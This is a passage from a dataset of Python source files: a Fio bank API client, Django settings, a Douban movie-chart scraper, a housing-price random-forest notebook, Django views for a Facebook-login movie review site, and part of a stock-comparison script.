'by-id/{token}/{year}/{number}/transactions.json',\n 'last': 'last/{token}/transactions.json',\n 'set-last-id': 'set-last-id/{token}/{from_id}/',\n 'set-last-date': 'set-last-date/{token}/{from_date}/',\n 'import': \"import/\",\n }\n\n transaction_schema = {\n u'ID pohybu': ('transaction_id', str),\n u'Datum': ('date', unicode),\n u'Objem': ('amount', float),\n u'Měna': ('currency', str),\n u'Protiúčet': ('account_number', str),\n u'Název protiúčtu': ('account_name', unicode),\n u'Kód banky': ('bank_code', str),\n u'BIC': ('bic', str),\n u'Název banky': ('bank_name', unicode),\n u'KS': ('constant_symbol', str),\n u'VS': ('variable_symbol', str),\n u'SS': ('specific_symbol', str),\n u'Uživatelská identifikace': ('user_identification', unicode),\n u'Zpráva pro příjemce': ('recipient_message', unicode),\n u'Typ': ('type', unicode),\n u'Provedl': ('executor', unicode),\n u'Upřesnění': ('specification', unicode),\n u'Komentář': ('comment', unicode),\n u'ID pokynu': ('instruction_id', str),\n }\n\n info_schema = {\n u'accountId': ('account_number', str),\n u'bankId': ('bank_code', str),\n u'currency': ('currency', str),\n u'IBAN': ('iban', str),\n u'BIC': ('bic', str),\n u'closingBalance': ('balance', float),\n }\n\n _amount_re = re.compile(r'\\-?[\\d+](\\.\\d+)? [A-Z]{3}')\n\n def __init__(self, token):\n self.token = token\n\n def _request(self, action, **params):\n\n template = self.base_url + self.actions[action]\n\n # Import method - goes via POST.\n if \"import\" == action:\n data = {\"token\": self.token}\n files = {\"file\": params.pop(\"file_content\")}\n data.update(params)\n\n response = requests.post(template, data=data, files=files)\n response.raise_for_status()\n\n return response.text\n\n # Other methods - go via GET.\n else:\n url = template.format(token=self.token, **params)\n response = requests.get(url)\n\n response.raise_for_status()\n\n if response.content:\n return response.json()\n\n def _parse_info(self, data):\n # parse data from API\n info = {}\n for key, value in data['accountStatement']['info'].items():\n if key in self.info_schema:\n field_name, type_ = self.info_schema[key]\n value = sanitize_value(value, type_)\n info[field_name] = value\n\n # make some refinements\n info['account_number_full'] = (info['account_number'] +\n '/' + info['bank_code'])\n\n # return data\n return info\n\n def _parse_transactions(self, data):\n schema = self.transaction_schema\n try:\n entries = data['accountStatement']['transactionList']['transaction']\n except TypeError:\n entries = []\n\n for entry in entries:\n # parse entry from API\n trans = {}\n for column_name, column_data in entry.items():\n if not column_data:\n continue\n field_name, type_ = schema[column_data['name']]\n value = sanitize_value(column_data['value'], type_)\n trans[field_name] = value\n\n # make some refinements\n is_amount = self._amount_re.match\n if 'specification' in trans and is_amount(trans['specification']):\n amount, currency = trans['specification'].split(' ')\n trans['original_amount'] = float(amount)\n trans['original_currency'] = currency\n\n if 'date' in trans:\n trans['date'] = coerce_date(trans['date'])\n\n if 'account_number' in trans and 'bank_code' in trans:\n trans['account_number_full'] = (trans['account_number'] +\n '/' + trans['bank_code'])\n\n # generate transaction data\n yield trans\n\n def _parse_import_response(self, xml):\n\n def parse_order(order):\n \"\"\"\n Parses ID, code and message from order XML.\n \"\"\"\n\n return {\n \"id\": int(order[\"@id\"]),\n \"code\": 
int(order[\"messages\"][\"message\"][\"@errorCode\"]),\n \"message\": order[\"messages\"][\"message\"][\"#text\"]\n }\n\n data = xmltodict.parse(xml.strip())\n data = data[\"responseImport\"]\n\n # If request was errorfree, parse response.\n if \"0\" == data[\"result\"][\"errorCode\"]:\n return {\n \"status\": True,\n \"instruction_id\": data[\"result\"][\"idInstruction\"],\n \"sum\": data[\"result\"][\"sums\"][\"sum\"][\"sumDebet\"],\n }\n\n else:\n details = []\n\n # If orderDetails has more detail items, iterate thru them.\n if isinstance(data[\"ordersDetails\"][\"detail\"], list):\n for o in data[\"ordersDetails\"][\"detail\"]:\n details.append(parse_order(o))\n\n else:\n details.append(parse_order(data[\"ordersDetails\"][\"detail\"]))\n\n return {\"status\": False, \"details\": details}\n\n def info(self):\n today = date.today()\n data = self._request('periods', from_date=today, to_date=today)\n return self._parse_info(data)\n\n def period(self, from_date, to_date):\n data = self._request('periods',\n from_date=coerce_date(from_date),\n to_date=coerce_date(to_date))\n return self._parse_transactions(data)\n\n def statement(self, year, number):\n data = self._request('by-id', year=year, number=number)\n return self._parse_transactions(data)\n\n def last(self, from_id=None, from_date=None):\n assert not (from_id and from_date), \"Only one constraint is allowed.\"\n\n if from_id:\n self._request('set-last-id', from_id=from_id)\n elif from_date:\n self._request('set-last-date', from_date=coerce_date(from_date))\n\n return self._parse_transactions(self._request('last'))\n\n def send(self, type, language, filename, file_content):\n \"\"\"\n Send = FIO \"import\" method (we cannot use \"import\" because it's Python keyword).\n Sends file of \"sending money requests\" and returns dict.\n\n In case of success:\n {\n \"status\": True,\n \"instruction_id\": 123,\n \"sum\": 1000\n }\n\n In case of failure:\n {\n \"status\": False,\n \"details\": [\n {\n \"id\" \"1\",\n \"code\" \"16\",\n \"message\": \"Lorem ipsum...\",\n },\n {\n \"id\" \"2\",\n \"code\" \"16\",\n \"message\": \"Lorem ipsum...\",\n },\n ...\n ]\n }\n \"\"\"\n\n response = self._request(\"import\", type=type, lng=language, filename=filename, file_content=file_content)\n\n return self._parse_import_response(response)\n","sub_path":"fiobank.py","file_name":"fiobank.py","file_ext":"py","file_size_in_byte":7984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"633952217","text":"\"\"\"\r\nDjango settings for DjangoExtJs project.\r\n\"\"\"\r\n\r\nfrom os import path\r\nPROJECT_ROOT = path.dirname(path.abspath(path.dirname(__file__)))\r\n\r\nDEBUG = True\r\nTEMPLATE_DEBUG = DEBUG\r\n\r\nALLOWED_HOSTS = (\r\n 'localhost',\r\n\t'127.0.0.1',\r\n)\r\n\r\nADMINS = (\r\n # ('Your Name', 'your_email@example.com'),\r\n)\r\n\r\nMANAGERS = ADMINS\r\n\r\nDATABASES = {\r\n 'default': {\r\n 'ENGINE': 'django.db.backends.sqlite3',\r\n 'NAME': path.join(PROJECT_ROOT, 'db.sqlite3'),\r\n 'USER': '',\r\n 'PASSWORD': '',\r\n 'HOST': '',\r\n 'PORT': '',\r\n }\r\n}\r\n\r\n\r\nTIME_ZONE = 'America/Chicago'\r\n\r\nLANGUAGE_CODE = 'en-us'\r\n\r\nSITE_ID = 1\r\n\r\nUSE_I18N = True\r\n\r\nUSE_L10N = True\r\n\r\nUSE_TZ = True\r\n\r\nMEDIA_ROOT = ''\r\n\r\nMEDIA_URL = ''\r\n\r\nSTATIC_ROOT = path.join(PROJECT_ROOT, 'static').replace('\\\\', '/')\r\n\r\nSTATIC_URL = '/static/'\r\n\r\n# Additional locations of static files\r\nSTATICFILES_DIRS = (\r\n # Put strings here, like \"/home/html/static\" or 
\"C:/www/django/static\".\r\n # Always use forward slashes, even on Windows.\r\n # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\n# List of finder classes that know how to find static files in\r\n# various locations.\r\nSTATICFILES_FINDERS = (\r\n 'django.contrib.staticfiles.finders.FileSystemFinder',\r\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\r\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\r\n)\r\n\r\n# Make this unique, and don't share it with anybody.\r\nSECRET_KEY = 'n(bd1f1c%e8=_xad02x5qtfn%wgwpi492e$8_erx+d)!tpeoim'\r\n\r\n# List of callables that know how to import templates from various sources.\r\nTEMPLATE_LOADERS = (\r\n 'django.template.loaders.filesystem.Loader',\r\n 'django.template.loaders.app_directories.Loader',\r\n# 'django.template.loaders.eggs.Loader',\r\n)\r\n\r\nMIDDLEWARE_CLASSES = (\r\n 'django.middleware.common.CommonMiddleware',\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.middleware.csrf.CsrfViewMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'django.contrib.messages.middleware.MessageMiddleware',\r\n # Uncomment the next line for simple clickjacking protection:\r\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\r\n)\r\n\r\nROOT_URLCONF = 'DjangoExtJs.urls'\r\n\r\n# Python dotted path to the WSGI application used by Django's runserver.\r\nWSGI_APPLICATION = 'DjangoExtJs.wsgi.application'\r\n\r\nTEMPLATE_DIRS = (\r\n # Put strings here, like \"/home/html/django_templates\" or\r\n # \"C:/www/django/templates\".\r\n # Always use forward slashes, even on Windows.\r\n # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\nINSTALLED_APPS = (\r\n 'django.contrib.auth',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.sessions',\r\n 'django.contrib.sites',\r\n 'django.contrib.messages',\r\n 'django.contrib.staticfiles',\r\n 'rest_framework',\r\n 'app'\r\n)\r\n\r\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\r\n","sub_path":"DjangoExtJs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"288651219","text":"# __author__ = 'colleen'\n# !/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nimport requests\n\n# 抓取豆瓣排行榜电影\nurl = 'http://movie.douban.com/chart'\n# page = urllib.request.urlopen(url).read().decode('utf-8')\npage = requests.get(url).text\nsoup = BeautifulSoup(page, 'html.parser')\n\n\n# 新片榜\nNewRanking = soup.find('div', attrs={'class': 'indent'}).find_all('tr', attrs={'class': 'item'})\nprint('豆瓣新片榜---------------------------------------------------------------\\n')\nfor item in NewRanking:\n name = item.find('img').attrs['alt']\n bintros = item.find('p').get_text()\n scores = item.find('span', attrs={'class': 'rating_nums'}).get_text()\n numcomments = item.find('span', attrs={'class': 'pl'}).get_text()\n print(name, bintros, scores, numcomments, '\\n')\n\n\n# 北美票房榜\nNAranking = soup.find('div', id='ranking').find('ul', id='listCont1')\nprint('\\n\\n\\n北美票房榜---------------------------------------------------------------')\nprint(NAranking.find('span', attrs={'class': 'box_chart_num color-gray'}).get_text(), '\\n')\n\ni = 1\nmoney = NAranking.find_all('span')\nfor item in NAranking.find_all('a'):\n print('%2d' % i, item.get_text().strip(), money[i].get_text())\n i += 
1\n","sub_path":"BS4/code_2.x_22.py","file_name":"code_2.x_22.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"387279957","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Normalizer\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import r2_score\n\n\n#%%\nfrom pylab import rcParams\nget_ipython().run_line_magic('matplotlib', 'inline')\nget_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'svg'\")\nrcParams['figure.figsize'] = 8, 7\n\n#%%\ntrain = pd.read_csv('final/data/train.csv')\n\n#%% Удаляем лишние стобцы\ntrain = train.drop(['Healthcare_1'], axis=1)\n\n#%% Удаляем явно ошибочные записи\ntrain = train.loc[~(train['Id'] == train['Ecology_2'])]\n\n#%% [markdown] \n# Поля Flor и HouseFloor\n\n#%% Убираем очень высокие здания.\ntrain.loc[train['HouseFloor'] > 50, ['HouseFloor']] = train['HouseFloor'].mean().astype('int')\n\n#%% Убираем очень большие этаж.\ntrain.loc[train['Floor'] > 50 , ['Floor']] = train['Floor'].mean().astype('int')\n\n#%% Убираем этажность здания, где этаже больше здания.\ntrain.loc[train['Floor'] > train['HouseFloor'], ['HouseFloor']] = train['Floor']\n\n#%% Cоставим признак, который указывает на первый или последний этаж\ntrain['frs_lst_floor'] = (train['Floor'] == train['HouseFloor']) | (train['Floor'] <= 1)\ntrain['frs_lst_floor'] = train['frs_lst_floor'].astype('int')\n\n#%% [markdown]\n# Поле HouseYear\n\n#%% fix неправильной записи\ntrain.loc[train['HouseYear'] == 20052011, ['HouseYear']] = 2005\n\n#%% Заменяем слишком большие и слишком маленькие года домов на средние по району\ntrain.loc[~train['HouseYear'].between(1800, 2030), ['HouseYear']] = train.loc[train['HouseYear'].between(1800, 2030), :].groupby(['DistrictId'])['HouseYear'].mean().astype('int32')\n\n#%% Определим возраст района\ndist_mean_year = train.groupby(['DistrictId'])[['HouseYear']].mean().astype('int32').reset_index().rename(columns={'HouseYear': 'Dist_mean_year'})\ntrain = train.merge(dist_mean_year, on=('DistrictId'), how='left')\n\n#%% Заполняем пустые года\ntrain.loc[train['HouseYear'].isna(), ['HouseYear']] = train['Dist_mean_year']\n\n#%% Новый признак - исторический дом\ntrain['Historical_House'] = (train['HouseYear'] < 1930).astype('int32')\n\n#%% Новый признак - военные дома\ntrain['War_House'] = (train['HouseYear'].between(1929, 1947)).astype('int32')\n\n#%% Новый признак - дом в процессе строителства или сдачи\ntrain['Not_Finish_House'] = (train['HouseYear'] >= 2018).astype('int32')\n\n#%% [markdown]\n# Поля LifeSquare Square Rooms\n\n#%% Устновка общей площади, которая меньше жилой\ntrain.loc[train['LifeSquare'] > train['Square'], ['Square']] = train['LifeSquare']\n\n#%% Редактирование слишком маленьких площадей\ntrain.loc[train['Square'] < 15, ['Square', 'LifeSquare']] = train[['Square', 'LifeSquare']] * 10\n\n#%% Уделание завышенных площадей\ntrain = train.loc[train['Square'].between(15, 700)]\n\n#%% Средняя комната в районе в домах одного года постройки\nsquare_mean_dist_rooms = train.loc[train['Rooms'] != 0].groupby(['DistrictId', 'Rooms', 'HouseYear'])[['Square']].mean().reset_index().rename(columns={'Square': 'Square_mean_dist_rooms'})\nsquare_mean_dist_rooms['Room_mean_sq'] = square_mean_dist_rooms['Square_mean_dist_rooms'] / 
square_mean_dist_rooms['Rooms']\nsquare_mean_dist_rooms = square_mean_dist_rooms.drop(['Rooms', 'Square_mean_dist_rooms'], axis=1)\nsquare_mean_dist_rooms = square_mean_dist_rooms.groupby(['DistrictId', 'HouseYear'])['Room_mean_sq'].mean().reset_index()\ntrain = train.merge(square_mean_dist_rooms, on=['DistrictId', 'HouseYear'], how='left')\n\n#%% Выставляем \tRoom_mean_sq у строк, которые не заполнились\ntrain.loc[train['Room_mean_sq'].isna(), ['Room_mean_sq']] = train['Room_mean_sq'].mean()\n\n#%% Расчет количаства комнат \ntrain.loc[train['Rooms'] == 0, ['Rooms']] = (train['Square'] / train['Room_mean_sq']).astype('int32')\ntrain.loc[train['Rooms'] > 6 , ['Rooms']] = (train['Square'] / train['Room_mean_sq']).astype('int32')\ntrain.loc[train['Rooms'] == 0, ['Rooms']] = 1\n\n#%% Ввод показателя Square^2\ntrain['Square_2'] = train['Square'] ** 2\n\n#%% Ввод новых параметров. Нормальное кол-во комнат, Нормальнаый год\ntrain[['N_Rooms', 'N_HouseYear']] = train[['Rooms', 'HouseYear']]\ntrain.loc[train['N_Rooms'] > 3, ['N_Rooms']] = 4\ntrain.loc[train['Historical_House'] == 1, ['N_HouseYear']] = 1910\ntrain['N_HouseYear'] -= train['N_HouseYear'] % 10\n\n#%% Ввод показателя для финасовой составляющей района\ndist_room_mean_price = train.groupby(['DistrictId', 'N_Rooms', 'N_HouseYear'])['Price'].mean().reset_index().rename(columns={'Price':'Mean_Dist_Price'})\ntrain = train.merge(dist_room_mean_price, on=['DistrictId', 'N_Rooms', 'N_HouseYear'], how='left')\n\n#%% [markdown]\n# KitchenSquare и LifeSquare учитывать в расчетах не будем в виду серьезных допущений\n\n#%% [markdown]\n# Поле эколоджи Ecology_1 используем как есть\n\n#%% [markdown]\n# Поле эколоджи Ecology_2 Ecology_3 Shops_2 перевести в dummies\ntrain = pd.get_dummies(train)\n\n#%% [markdown] \n# Обучение\n\n#%% Поля для участия в обучении\nfts = [\n # 'Id',\n # 'DistrictId',\n # 'Rooms',\n # 'Square',\n 'Square_2',\n # 'LifeSquare',\n # 'KitchenSquare',\n 'Floor',\n 'HouseFloor',\n 'HouseYear',\n 'Ecology_1',\n 'Social_1',\n 'Social_2',\n 'Social_3',\n 'Helthcare_2',\n 'Shops_1',\n # 'Price',\n 'frs_lst_floor',\n 'Dist_mean_year',\n 'Historical_House',\n 'War_House',\n 'Not_Finish_House',\n 'Room_mean_sq',\n 'Ecology_2_A',\n 'Ecology_2_B',\n 'Ecology_3_A',\n 'Ecology_3_B',\n 'Shops_2_A',\n 'Shops_2_B',\n 'Mean_Dist_Price',\n # 'N_Rooms',\n # 'N_HouseYear'\n]\n\n#%% Получение тестового и валидационного датасетов\nX = train[fts]\ny = train['Price']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n\n# #%% Нормализация данных\n# scaler = StandardScaler()\n# X_train_scaled = scaler.fit_transform(X_train)\n# X_test_scaled = scaler.transform(X_test)\n# X_train_scaled = pd.DataFrame(X_train_scaled, columns=fts)\n# X_test_scaled = pd.DataFrame(X_test_scaled, columns=fts)\n\n# #%% Обучение RF на нормаливанных данных\n# model = RandomForestRegressor(n_estimators=2000, max_depth=15, random_state=42, n_jobs=8)\n# model.fit(X_train_scaled, y_train)\n# train_pred = model.predict(X_train_scaled)\n# r2_score(y_train, train_pred)\n\n# #%% Проверка на нормализованных данных\n# test_pred = model.predict(X_test_scaled)\n# r2_score(y_test, test_pred)\n\n#%% Подбор параметров на стоке\n# score_train = 0\n# score_test = 0\n# best_dep = 0\n# for i in range(100, 2000, 200):\n# model = RandomForestRegressor(n_estimators=i, max_depth=12, random_state=42, n_jobs=8)\n# model.fit(X_train, y_train)\n# train_pred = model.predict(X_train)\n# r2_train = r2_score(y_train, train_pred)\n# test_pred = model.predict(X_test)\n# 
r2_test = r2_score(y_test, test_pred)\n# if r2_test > score_test:\n# score_test = r2_test\n# score_train = r2_train\n# best_dep = i\n# print('Лучшее {} при dep = {} (train {})'.format(score_test, best_dep, score_train))\n\n#%% Расчет на стоке\nmodel = RandomForestRegressor(n_estimators=700, max_depth=14, random_state=42, n_jobs=8)\nmodel.fit(X_train, y_train)\ntrain_pred = model.predict(X_train)\nr2_train = r2_score(y_train, train_pred)\ntest_pred = model.predict(X_test)\nr2_test = r2_score(y_test, test_pred)\nprint('r2 тест: {}, r2 трайн: {}'.format(r2_test, r2_train))\n\n\n\n\n#0----------------------------------------------------------------------------------------\n\n\n#%% [markdown] \n# Обработка test.csv\n\n#%%\ntest = pd.read_csv('final/data/test.csv')\ntest.describe()\n\n#%% Удаляем лишние стобцы\ntest = test.drop(['Healthcare_1'], axis=1)\n\n#%% Проверяем могут ли быть потенциально ошибочные данные\ntest.loc[test['Id'] == test['Helthcare_2']]\n\n#%% [markdown] \n# Поля Flor и HouseFloor\n\n#%% Убираем очень высокие здания.\ntest.loc[test['HouseFloor'] > 50, ['HouseFloor']] = test['HouseFloor'].mean().astype('int')\n\n#%% Убираем этажность здания, где этаже больше здания.\ntest.loc[test['Floor'] > test['HouseFloor'], ['HouseFloor']] = test['Floor']\n\n#%% Cоставим признак, который указывает на первый или последний этаж\ntest['frs_lst_floor'] = (test['Floor'] == test['HouseFloor']) | (test['Floor'] <= 1)\ntest['frs_lst_floor'] = test['frs_lst_floor'].astype('int')\n\n#%% [markdown]\n# Поле HouseYear\n\n#%% Заменяем слишком большие и слишком маленькие года домов на средние по району\ntest.loc[~test['HouseYear'].between(1800, 2030), ['HouseYear']] = test.loc[test['HouseYear'].between(1800, 2030), :].groupby(['DistrictId'])['HouseYear'].mean().astype('int32')\n\n#%% Определим возраст района\ndist_mean_year = test.groupby(['DistrictId'])[['HouseYear']].mean().astype('int32').reset_index().rename(columns={'HouseYear': 'Dist_mean_year'})\ntest = test.merge(dist_mean_year, on=('DistrictId'), how='left')\n\n#%% Заполняем пустые года\ntest.loc[test['HouseYear'].isna(), ['HouseYear']] = test['Dist_mean_year']\n\n#%% Новый признак - исторический дом\ntest['Historical_House'] = (test['HouseYear'] < 1930).astype('int32')\n\n#%% Новый признак - военные дома\ntest['War_House'] = (test['HouseYear'].between(1929, 1947)).astype('int32')\n\n#%% Новый признак - дом в процессе строителства или сдачи\ntest['Not_Finish_House'] = (test['HouseYear'] >= 2018).astype('int32')\n\n#%% [markdown]\n# Поля LifeSquare Square Rooms\n\n#%% Устновка общей площади, которая меньше жилой\ntest.loc[test['LifeSquare'] > test['Square'], ['Square']] = test['LifeSquare']\n\n#%% Редактирование слишком маленьких площадей\ntest.loc[test['Square'] < 13, ['Square', 'LifeSquare']] = test[['Square', 'LifeSquare']] * 10\n\n\n#%% Средняя комната в районе в домах одного года постройки\nsquare_mean_dist_rooms = test.loc[test['Rooms'] != 0].groupby(['DistrictId', 'Rooms', 'HouseYear'])[['Square']].mean().reset_index().rename(columns={'Square': 'Square_mean_dist_rooms'})\nsquare_mean_dist_rooms['Room_mean_sq'] = square_mean_dist_rooms['Square_mean_dist_rooms'] / square_mean_dist_rooms['Rooms']\nsquare_mean_dist_rooms = square_mean_dist_rooms.drop(['Rooms', 'Square_mean_dist_rooms'], axis=1)\nsquare_mean_dist_rooms = square_mean_dist_rooms.groupby(['DistrictId', 'HouseYear'])['Room_mean_sq'].mean().reset_index()\ntest = test.merge(square_mean_dist_rooms, on=['DistrictId', 'HouseYear'], how='left')\n\n#%% Выставляем \tRoom_mean_sq у строк, 
которые не заполнились\ntest.loc[test['Room_mean_sq'].isna(), ['Room_mean_sq']] = test['Room_mean_sq'].mean()\n\n#%% Расчет количаства комнат \ntest.loc[test['Rooms'] == 0, ['Rooms']] = (test['Square'] / test['Room_mean_sq']).astype('int32')\ntest.loc[test['Rooms'] > 6 , ['Rooms']] = (test['Square'] / test['Room_mean_sq']).astype('int32')\ntest.loc[test['Rooms'] == 0, ['Rooms']] = 1\n\n#%% Ввод показателя Square^2\ntest['Square_2'] = test['Square'] ** 2\n\n#%% Ввод новых параметров. Нормальное кол-во комнат, Нормальнаый год\ntest[['N_Rooms', 'N_HouseYear']] = test[['Rooms', 'HouseYear']]\ntest.loc[test['N_Rooms'] > 3, ['N_Rooms']] = 4\ntest.loc[test['Historical_House'] == 1, ['N_HouseYear']] = 1910\ntest['N_HouseYear'] -= test['N_HouseYear'] % 10\n\n#%% Ввод показателя для финасовой составляющей района, максимальная точность\ndist_room_mean_price = train.groupby(['DistrictId', 'N_Rooms', 'N_HouseYear'])['Price'].mean().reset_index().rename(columns={'Price':'Mean_Dist_Price'})\ntest = test.merge(dist_room_mean_price, on=['DistrictId', 'N_Rooms', 'N_HouseYear'], how='left')\n\n#%% Mean_Dist_Price из точной стоимости м2\nprice_dist_m2_mean = test.loc[~test['Mean_Dist_Price'].isna()].groupby(['DistrictId','N_HouseYear'])[['Square','Mean_Dist_Price']].mean().reset_index().rename(columns={'Mean_Dist_Price':'Mean_Dist_Price_2'})\nprice_dist_m2_mean['Price_mean_m2'] = price_dist_m2_mean['Mean_Dist_Price_2'] / price_dist_m2_mean['Square']\nprice_dist_m2_mean = price_dist_m2_mean.drop(['Mean_Dist_Price_2', 'Square'], axis=1)\ntest = test.merge(price_dist_m2_mean, on=['DistrictId', 'N_HouseYear'], how='left')\ntest.loc[test['Mean_Dist_Price'].isna(), ['Mean_Dist_Price']] = test['Price_mean_m2'] * test['Square']\ntest = test.drop(['Price_mean_m2'], axis=1)\n\n#%% Mean_Dist_Price из неточной стоимости м2\nprice_dist_m2_mean = test.loc[~test['Mean_Dist_Price'].isna()].groupby(['DistrictId'])[['Square','Mean_Dist_Price']].mean().reset_index().rename(columns={'Mean_Dist_Price':'Mean_Dist_Price_2'})\nprice_dist_m2_mean['Price_mean_m2'] = price_dist_m2_mean['Mean_Dist_Price_2'] / price_dist_m2_mean['Square']\nprice_dist_m2_mean = price_dist_m2_mean.drop(['Mean_Dist_Price_2', 'Square'], axis=1)\ntest = test.merge(price_dist_m2_mean, on=['DistrictId'], how='left')\ntest.loc[test['Mean_Dist_Price'].isna(), ['Mean_Dist_Price']] = test['Price_mean_m2'] * test['Square']\n\n#%% Mean_Dist_Price дозаполнение средним показателем.\ntest.loc[test['Mean_Dist_Price'].isna(), ['Mean_Dist_Price']] = test['Price_mean_m2'].mean() * test['Square']\n\n#%% Создаем dummies\ntest = pd.get_dummies(test)\n\n#%% Обучаем модель на тестовых данных\nmodel = RandomForestRegressor(n_estimators=700, max_depth=14, random_state=42, n_jobs=8)\nmodel.fit(train[fts], train['Price'])\n\n#%% Предстказываем\nprice_pred = model.predict(test[fts])\n\n#%% Сохранение результата в поле Price\ntest['Price'] = price_pred\n\n#%%\ntest[['Id', 'Price']].to_csv('KSidorov_predictions.csv', index=None)\n\n#%%\n","sub_path":"python-for-data-science/final/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":15299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"73166868","text":"from django.shortcuts import render_to_response\nfrom django.shortcuts import redirect\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout as social_logout\nfrom django.core.files.base import ContentFile\nfrom 
django.template.defaultfilters import slugify\nfrom django.http import HttpResponse\n\nfrom mavenize.user_profile.models import UserProfile\nfrom mavenize.movie.models import Movie\nfrom mavenize.review.models import Review\nfrom mavenize.review.models import Thanks\nfrom mavenize.movie.models import MoviePopularity\nfrom mavenize.social_graph.models import Following\nfrom mavenize.general_utilities.models import FeedbackForm\n# from actstream.actions import follow\n\nfrom mavenize.general_utilities.utils import retrieve_objects\nfrom urllib2 import urlopen, HTTPError\nimport facebook\n\ndef index(request):\n if request.session.get('social_auth_last_login_backend') == 'facebook':\n return feed(request)\n return render_to_response('index.html', {},\n context_instance=RequestContext(request))\n\n@login_required\ndef login(request):\n user_id = request.user.id\n social_user = request.user.social_auth.get(provider='facebook')\n graph = facebook.GraphAPI(social_user.extra_data['access_token'])\n\n profile, created = UserProfile.objects.get_or_create(\n user=request.user)\n\n if created:\n url = \"http://graph.facebook.com/%s/picture\" % social_user.uid \n small_picture = urlopen(url, timeout=30)\n large_picture = urlopen(url+'?type=large', timeout=30)\n profile.picture_small.save(\n slugify(user_id)+u'.jpg',\n ContentFile(small_picture.read())\n )\n profile.picture_large.save(\n slugify(user_id)+u'_large.jpg',\n ContentFile(large_picture.read()),\n )\n\n return redirect('/')\n\n@login_required\ndef logout(request):\n social_logout(request)\n return redirect('/')\n\n@login_required\ndef feed(request):\n context = load_feed(request, None, 1) \n context['form'] = FeedbackForm()\n\n # Get the top 8 most popular movies\n pm_id = MoviePopularity.objects.all().values_list('movie',flat=True)[:4]\n context['popular_movies'] = Movie.objects.filter(pk__in=pm_id).values(\n 'image', 'url')\n\n return render_to_response('feed.html', context,\n context_instance=RequestContext(request))\n \ndef load_feed(request, review_type, page):\n user_id = request.user.id\n context = {}\n \n # Retrieve the 10 most recent friends reviews\n following = Following.objects.filter(\n fb_user=user_id).values_list('follow',flat=True)\n friend_reviews = Review.objects.filter(user__in=following).values(\n 'review_id',\n 'user',\n 'table_id_in_table',\n 'text',\n 'up_votes',\n 'created_at'\n )[10*(int(page)-1):10*int(page)]\n review_count = len(friend_reviews)\n\n if review_count:\n context['friend_reviews'] = aggregate(user_id, friend_reviews)\n\n if request.is_ajax() and review_type == 'friend':\n if not review_count:\n return HttpResponse(status=204)\n \n return render_to_response(\n 'partials/friend_review.html',\n context,\n context_instance=RequestContext(request)\n )\n \n # If there are less than 10, supplement them with global reviews\n if review_count < 10:\n global_reviews = Review.objects.exclude(\n user__in=following).exclude(user=user_id).values(\n 'review_id',\n 'user',\n 'table_id_in_table',\n 'text',\n 'up_votes',\n 'created_at'\n )[10*(int(page)-1):(10-review_count)*int(page)]\n \n context['global_reviews'] = aggregate(user_id, global_reviews)\n\n if request.is_ajax() and review_type == 'global':\n if not context['global_reviews']:\n return HttpResponse(status=204)\n \n return render_to_response(\n 'partials/global_review.html',\n context,\n context_instance=RequestContext(request)\n )\n \n return context\n\n# Creates a tuple of reviews and movies for a given user and set of reviews\ndef aggregate(user, reviews):\n 
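# gather user, review and movie ids first so the related rows can be\n    # fetched in bulk instead of being queried one review at a time\n    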
uids = []\n rids = []\n mids = []\n \n for r in reviews:\n uids.append(r['user'])\n rids.append(r['review_id'])\n mids.append(r['table_id_in_table'])\n\n users = retrieve_objects(\n uids, 'auth', 'User', 'id', 'first_name')\n movies = retrieve_objects(\n mids, 'movie', 'Movie', 'movie_id', 'title', 'image', 'url')\n thanked_reviews = Thanks.objects.filter(review__in=rids).filter(\n giver=user).values_list('review', flat=True)\n\n for review, user, movie in zip(reviews, users, movies):\n review.update(user)\n review.update(movie)\n if review['review_id'] in thanked_reviews:\n review['thanked'] = True\n else:\n review['thanked'] = False\n\n return reviews\n","sub_path":"mavenize-alpha/mavenize/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"191362396","text":"import pandas as pd\n\nfrom ru.textilstock.assortment.stocks.remains_djama_parser import parse_djama_stocks\n\nMAPPING_DJAMA_DETAIL_WILD_TO_NOMENCLATURE_FILE_CSV = '/home/stani/PycharmProjects/texstock/ru/textilstock/assortment' \\\n '/djama/xls/detail_to_nomen_mapping.csv'\n\n\ndef write_data_to_csv(data_frame, output_file_csv):\n s = data_frame.to_csv(index=False)\n with open(output_file_csv, \"w\") as text_file:\n text_file.write(s)\n\n\ndef compare_stocks(djama_stocks_xls, wildberries_stocks_xlsx, output_csv):\n djama_remains_df = parse_djama_stocks(djama_stocks_xls)\n\n remains_to_nomen_dataset = pd.read_csv(MAPPING_DJAMA_DETAIL_WILD_TO_NOMENCLATURE_FILE_CSV)\n\n skipped = djama_remains_df.join(remains_to_nomen_dataset.set_index('article'),\n on='article', how='left')\n skipped = skipped[skipped['nomenclature'].isnull()]\n if len(skipped) > 0:\n print(\"nomenclature NOT exist in \" + 